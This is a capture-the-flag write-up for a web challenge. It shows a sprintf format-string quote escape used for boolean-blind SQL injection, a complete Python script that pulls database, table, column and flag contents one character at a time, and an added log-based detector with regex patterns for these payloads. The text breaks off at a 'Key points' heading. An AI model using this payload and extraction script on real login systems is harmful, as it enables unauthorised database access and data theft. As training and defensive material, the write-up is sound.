
CTF "Celebrate Christmas, Win Big Prizes" event challenge: SQLi


Points: 200  Type: Web  Challenge name: SQLi
Challenge description: find the flag.


Solution steps

  1. Open the link: it is a login page with no registration form. Submitting admin/admin returns "password error!".
  2. Inspecting the request and response shows nothing unusual.
  3. Running Burp Intruder over the username field shows that a username of admin% produces an error.
  4. So this is a sprintf format-string problem that lets a single quote escape the escaping.
  5. After trying various strings, POST data of username=admin%1$\\' or 1=1 # &password=admin returns "password error!", while username=admin%1$\\' or 1=2 # &password=admin returns "username error!", so this is clearly the injection point.
  6. Run a script to extract the flag.

Code:

```python
# coding: utf-8
import requests
import string

URL = r'http://af6add5b19fe4fddad8a5d5e413129df464f7ee5ce6d4a89.game.ichunqiu.com/index.php'
RIGHT = 'password error!'   # response when the injected condition is true
ERROR = 'username error!'   # response when the injected condition is false
PREFIX = "admin%1$\\' or "  # sprintf quote escape found in step 5
# Character set for the flag; the punctuation part of the published list was
# garbled in the page, so this is an assumed set of common symbols.
DIC = string.digits + string.ascii_letters + "!@#$%^&*()_+{}-="


def ask(s, condition):
    """Send one boolean probe and return the response body."""
    data = {'username': PREFIX + condition + "#", 'password': '1'}
    return s.post(URL, data=data).text


def find_length(s, expr, start=0):
    """Increase i until expr > i is false; that i is the length."""
    i = start
    while True:
        if ERROR in ask(s, expr + ">" + str(i)):
            return i
        i += 1


def dump(s, expr, length):
    """Recover expr one character at a time by comparing ascii codes."""
    strs = ''
    for i in range(length + 1):
        for c in DIC:
            probe = "ascii(substr(" + expr + "," + str(i) + ",1))=" + str(ord(c))
            if RIGHT in ask(s, probe):
                strs += c
                print(strs)
                break
    return strs


def boom():
    s = requests.session()

    lens = find_length(s, "length(database())")
    print("[+]length(database()): %d" % lens)
    db = dump(s, "database()", lens)
    print("[+]database():%s" % db)

    lens = find_length(s, "(select length(table_name) from information_schema.tables"
                          " where table_schema=database() limit 0,1)", start=1)
    print("[+]length(table): %d" % lens)
    table_name = dump(s, "(select table_name from information_schema.tables"
                         " where table_schema=database() limit 0,1)", lens)
    print("[+]table_name:%s" % table_name)
    tablename = '0x' + table_name.encode().hex()   # hex literal avoids quotes

    lens = find_length(s, "(select length(column_name) from information_schema.columns"
                          " where table_name = " + tablename + " limit 0,1)")
    print("[+]length(column): %d" % lens)
    column_name = dump(s, "(select column_name from information_schema.columns"
                          " where table_name = " + tablename + " limit 0,1)", lens)
    print("[+]column_name:%s" % column_name)

    num = find_length(s, "(select count(*) from " + table_name + ")")
    print("[+]number(column): %d" % num)
    lens = find_length(s, "(select length(" + column_name + ") from " + table_name + " limit 0,1)")
    print("[+]length(value): %d" % lens)
    # The original script hard-codes the names it just recovered (flag / flag).
    flag = dump(s, "(select flag from flag limit 0,1)", lens)
    print("[+]flag:%s" % flag)


if __name__ == '__main__':
    boom()
    print('Finish!')
```
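The script above works because every request carries one boolean condition and the page answers with one of two fixed strings, so a defender sees the attack as a long run of near-identical login attempts from one client whose payloads differ only in a number. The detector below is an added example written for this page, not code from the original writeup. It assumes an application or WAF log that records decoded POST form bodies in the constructed format "timestamp client-ip method path body"; the sample lines are constructed from the payload strings shown in this writeup. It flags the sprintf quote-escape signature (a positional specifier such as `%1$` directly before a quote) together with the boolean-blind probe functions, and raises one alert per client that sends five or more flagged requests within a minute, listing the numeric sequence the probes walked through.

```python
"""Detect boolean-based blind SQL injection of the kind used in this writeup
from log lines that carry decoded POST form parameters."""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlencode

# One log line: "<ISO timestamp> <client ip> <method> <path> <urlencoded body>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (.*)$")

INDICATORS = {
    # positional sprintf specifier right before a (possibly backslash-escaped) quote
    "format_specifier_before_quote": re.compile(r"%\d+\$\\?'"),
    # character-by-character comparison functions used by blind extraction
    "blind_char_probe": re.compile(r"\b(?:ascii|substr|substring|length)\s*\(", re.I),
    "schema_enumeration": re.compile(r"information_schema\.", re.I),
    # quote, boolean operator, and a trailing comment terminator
    "tautology_with_comment": re.compile(r"'\s*(?:or|and)\b.*(?:#|--)", re.I),
}
# the number a probe compares against, e.g. "...>3#" or "...=97#"
PROBE_TAIL = re.compile(r"[>=]\s*(\d+)\s*#?\s*$")


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, method, path, body = m.groups()
    params = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"ts": datetime.fromisoformat(ts), "ip": ip, "method": method,
            "path": path, "params": params}


def classify(params):
    """Names of the indicators that match any form parameter value."""
    hits = set()
    for value in params.values():
        for name, rx in INDICATORS.items():
            if rx.search(value):
                hits.add(name)
    return sorted(hits)


def probe_value(params):
    for value in params.values():
        m = PROBE_TAIL.search(value)
        if m:
            return int(m.group(1))
    return None


def find_blind_bursts(events, window_seconds=60, threshold=5):
    """One alert per client whose flagged requests cluster inside the window."""
    by_ip = defaultdict(list)
    for ev in events:
        if ev["hits"]:
            by_ip[ev["ip"]].append(ev)
    alerts = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = [], 0
        for end, ev in enumerate(evs):          # sliding window over time
            while (ev["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > len(best):
                best = evs[start:end + 1]
        if len(best) >= threshold:
            alerts.append({
                "ip": ip,
                "requests": len(best),
                "first": best[0]["ts"].isoformat(),
                "last": best[-1]["ts"].isoformat(),
                "indicators": sorted({h for e in best for h in e["hits"]}),
                "probe_values": [e["probe_value"] for e in best
                                 if e["probe_value"] is not None],
            })
    return alerts


def analyse(log_text, window_seconds=60, threshold=5):
    events = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ev["hits"] = classify(ev["params"])
        ev["probe_value"] = probe_value(ev["params"])
        events.append(ev)
    return events, find_blind_bursts(events, window_seconds, threshold)


# Constructed sample traffic (not real logs): two normal logins plus the
# probe sequence this writeup's script would generate, from one client.
def _line(ts, ip, username, password):
    return f"{ts} {ip} POST /index.php " + urlencode({"username": username, "password": password})


_QUOTE_ESCAPE = "admin%1$\\' or "
SAMPLE_LOG = "\n".join(
    [_line("2015-12-24T10:00:01", "203.0.113.5", "alice", "s3cret"),
     _line("2015-12-24T10:00:07", "198.51.100.9", "admin%", "admin"),
     _line("2015-12-24T10:00:08", "198.51.100.9", _QUOTE_ESCAPE + "1=1 #", "admin")]
    + [_line(f"2015-12-24T10:00:{10 + n:02d}", "198.51.100.9",
             _QUOTE_ESCAPE + f"length(database())>{n}#", "1") for n in range(5)]
    + [_line("2015-12-24T10:00:20", "198.51.100.9",
             _QUOTE_ESCAPE + "ascii(substr(database(),1,1))=97#", "1"),
       _line("2015-12-24T10:00:25", "203.0.113.5", "bob", "hunter2")])

if __name__ == "__main__":
    _, found = analyse(SAMPLE_LOG)
    for a in found:
        print(f"{a['ip']}: {a['requests']} probes {a['first']}..{a['last']} "
              f"values={a['probe_values']} indicators={a['indicators']}")
```

The single `admin%` request from step 3 is deliberately not flagged on its own: a lone stray percent sign is too common in real input, and it is the burst of comparison probes that follows which makes the pattern unmistakable.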

Key points